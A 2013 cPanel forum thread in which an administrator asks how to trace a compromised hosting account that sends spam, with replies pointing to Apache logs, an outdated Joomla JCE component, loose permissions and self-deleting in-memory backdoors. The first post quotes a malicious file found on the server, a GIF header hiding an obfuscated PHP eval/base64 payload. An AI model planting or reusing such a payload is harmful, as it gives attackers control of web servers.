Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Checking strange activity on account

Discussion in 'Security' started by madpato, Oct 14, 2013.

  1. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    44
    Likes Received:
    1
    Trophy Points:
    58
    Hello

    I have a user which i believe has been hacked and sends spam, well i have CSF and it let me know which file was doing this, got rid of it (yesterday) but today more php files showed up on the same folder, so i assume this is not over. Even i got some gif files with strange code like this:

    Code:
    GIF89aGbkht
    <?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci+SHRVBHDlmJZyRcHO4LIHhwYpIF23jtrqE5xH/vzNrOWKEcrRohb8/rM8/MzoYrJUisaymVEcXU3e3uYmGICWS3hNbcuJ04CqOoN+hfOXBpy+6cm2H3t8fNjc690MIksioMCcguOGge+Bge0W74Yji8onSj0VJ8NohT9AbVorhdRg/Dfy7DdRRfDnu1wUumZrCgLHJxzoopAQ+eGGVdYHX0p3Wm2YTnuykH00KiEPEUQzoojGaZZXSBf27YJY8dzZNXCTOH8NHRdhifD0bh+WAUrjjlWXEuva0Um7JPz2uWfZqizFhxQbcJtTzRem3GtMjIX9gUSZCZMeWe77dZAXRKbrpNukjtqtq/iFRrT3pinaq6cIjJKZJPTACJPxw97ROdkhJ/2oH44O/E1pMEmHiL8xnFU4bk38x4MPJJEZNOv3j/YDhofUW3Hz6IE/XjhqQBhK0OuAutSD4m8QACU2O0koe0PnEJiupO7EeBNleVRbuo32l8x86hSHqhLuNPZEapgqDEA+O2p48rZTvkjfylFNfXP5IDrL+fpFaElDlAmcpWjjsEmL7ApVeY5SCg9PBoT49ynrMiegk8EFJMGW/mJQ+o4V8MJchkQJM8pevaqBrnb6mv40Nlz7LKvt+BvY/IDp39aKQcGnFQ5EhzUcmUsWk7KTOsUt6Wg9X8QgmXciZMV0FSxnoZPk0/q3Mm0pQXDU1dcF8zmIB/o8bZxEra8/S+89sgp0X0+QDYal4nQhyB/CoCYtBDUBANis2N4s4A03i4aLxvPhD94nbwq/X/CQ29u42wIEz9VfEeQnQzuZJjsZZl4E/hU=')))); ?>
    Now i want to know where can i look to see the origin of this, tried ftp logs and nothing, /var/log/messages nothing regarding the location (or even mentioning the user account).
    What i do know that this user has an old joomla install i know for a fact that is probably the reason of this, what i need to know is a server-side solution to stop the creation of those files. Maybe changing permission of folders?

    Any ideas? Thanks.
     
  2. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    11
    Trophy Points:
    168
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    You shold check that account's access logs:
    /home/CPANELUSERNAME/access_logs
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    44
    Likes Received:
    1
    Trophy Points:
    58
    Hi

    Im afraid that directory is empty maybe i have something disabled that prevents the log from appearing??
     
  4. quizknows

    quizknows Well-Known Member

    Joined:
    Oct 20, 2009
    Messages:
    1,010
    Likes Received:
    87
    Trophy Points:
    78
    cPanel Access Level:
    DataCenter Provider
    Check /usr/local/apache/domlogs

    However, they need to update / patch their software. No amount of server-side security can make up for users running hackable applications. Do not allow people to run vulnerable appliations on your server. A good modsecurity ruleset can stop a lot of hacks but it is not foolproof.

    If the file in quesiton is in public_html/images/stories/ or public_html/tmp/ they probably have a hackable com_jce component. Check the date on files inside of public_html/components/com_jce/. If they are more than a year or two old that is the easiest way for an attacker to upload that code to a joomla site.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,711
    Likes Received:
    1,791
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello :)

    Also, check to see if any of the directories within this account are using insecure permissions (e.g. 0777). It's possible the scripts are uploaded through a Joomla plugin that allows uploads of this nature.

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. sehh

    sehh Well-Known Member

    Joined:
    Feb 11, 2006
    Messages:
    579
    Likes Received:
    5
    Trophy Points:
    168
    Location:
    Europe
    There is another cool way they use to do this, once they compromise an account, they upload a file, execute it and delete it, while leaving the process alive and kicking in memory!

    Thus, there is no file for you to find, its just not there because it deletes itself.

    Once this process is started, the file will open a TCP port and listen for remote commands, execute code, upload files in tmp directories, send information about the server to a remote listener, so on and so forth.

    So check the running processes, I've seen them use process names like "mysql" and similar ones.

    I found their trick quite effective and imaginative! :)
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice